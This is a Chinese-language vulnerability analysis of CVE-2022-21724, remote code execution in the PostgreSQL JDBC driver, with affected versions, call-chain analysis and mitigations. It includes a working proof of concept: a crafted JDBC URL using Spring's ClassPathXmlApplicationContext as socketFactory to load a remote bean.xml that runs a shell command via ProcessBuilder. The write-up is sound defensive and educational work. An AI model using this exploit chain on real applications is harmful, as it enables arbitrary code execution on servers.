PostgreSQL JDBC 驱动任意代码执行漏洞(CVE-2022-21724) 技术分析文档

漏洞概述

PostgreSQL JDBC 驱动(PgJDBC)中存在一个安全漏洞，当攻击者能够控制 JDBC URL 或连接属性时，可能导致远程代码执行(RCE)。该漏洞源于驱动程序在实例化插件类时未验证这些类是否实现了预期的接口。

漏洞原理

PgJDBC 驱动程序根据以下连接属性提供的类名实例化插件实例：

• authenticationPluginClassName
• sslhostnameverifier
• socketFactory
• sslfactory
• sslpasswordcallback

关键问题：驱动程序在实例化这些类之前没有验证类是否实现了预期的接口，导致可以加载任意类并执行其代码。

影响版本

受影响版本范围：

• 9.4.1208 ≤ PgJDBC < 42.2.25
• 42.3.0 ≤ PgJDBC < 42.3.2

漏洞复现

环境准备

1. 创建 Maven 项目并添加依赖：

<!-- PostgreSQL JDBC 驱动（漏洞版本） -->
<dependency>
    <groupId>org.postgresql</groupId>
    <artifactId>postgresql</artifactId>
    <version>42.3.1</version>
</dependency>

<!-- Spring 上下文支持（用于利用） -->
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-context-support</artifactId>
    <version>5.3.23</version>
</dependency>

2. 编写测试代码：

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;

public class cve202221724 {
    public static void main(String[] args) throws SQLException {
        String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";
        String socketFactoryArg = "http://127.0.0.1:8080/bean.xml";
        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test/?socketFactory=" 
            + socketFactoryClass + "&socketFactoryArg=" + socketFactoryArg;
        Connection connection = DriverManager.getConnection(jdbcUrl);
    }
}

3. 准备恶意 XML 文件 (bean.xml)：

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xmlns:p="http://www.springframework.org/schema/p"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    
    <bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>calc.exe</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

利用过程

1. 攻击者构造恶意 JDBC URL，通过 socketFactory 参数指定 Spring 的 ClassPathXmlApplicationContext 类
2. 通过 socketFactoryArg 参数指定远程 XML 配置文件位置
3. 当应用程序尝试建立数据库连接时，会加载并解析指定的 XML 文件
4. XML 文件中定义的恶意 bean 会被实例化并执行（本例中会启动计算器程序）

漏洞分析

调用链分析

1. java.sql.DriverManager#getConnection(java.lang.String)
2. java.sql.DriverManager#getConnection(java.lang.String, java.util.Properties, java.lang.Class<?>)
3. 使用 org.postgresql.Driver 驱动连接数据库
4. org.postgresql.Driver#connect
5. 调用 makeConnection 连接数据库
6. org.postgresql.Driver#makeConnection
7. org.postgresql.jdbc.PgConnection#PgConnection
8. org.postgresql.core.ConnectionFactory#openConnection
9. org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl
10. org.postgresql.core.SocketFactoryFactory#getSocketFactory

关键点

在 SocketFactoryFactory#getSocketFactory 方法中：

1. 从连接参数中获取 socketFactory 和 socketFactoryArg 的值
2. 直接使用反射实例化 socketFactory 指定的类
3. 没有验证该类是否实现了预期的 SocketFactory 接口
4. 将 socketFactoryArg 作为参数传递给该类的构造函数

修复方案

1. 升级到安全版本：

   • 升级到 42.2.25 或更高版本（针对 42.2.x 系列）
   • 升级到 42.3.2 或更高版本（针对 42.3.x 系列）

2. 临时缓解措施：

   • 限制应用程序中 JDBC URL 和连接参数的用户输入
   • 实施严格的输入验证，确保 socketFactory 等参数只能使用可信的、预定义的类

防御建议

1. 对所有数据库连接参数实施严格的输入验证
2. 使用最低权限原则运行应用程序
3. 定期更新依赖库到最新安全版本
4. 实施网络隔离，限制应用程序与数据库服务器之间的网络访问
5. 监控和记录异常的数据库连接尝试

总结

CVE-2022-21724 是一个典型的因缺乏输入验证而导致的安全漏洞，攻击者通过控制 JDBC 连接参数实现任意代码执行。开发人员应特别注意外部输入的安全性，特别是像数据库连接字符串这样的敏感配置项。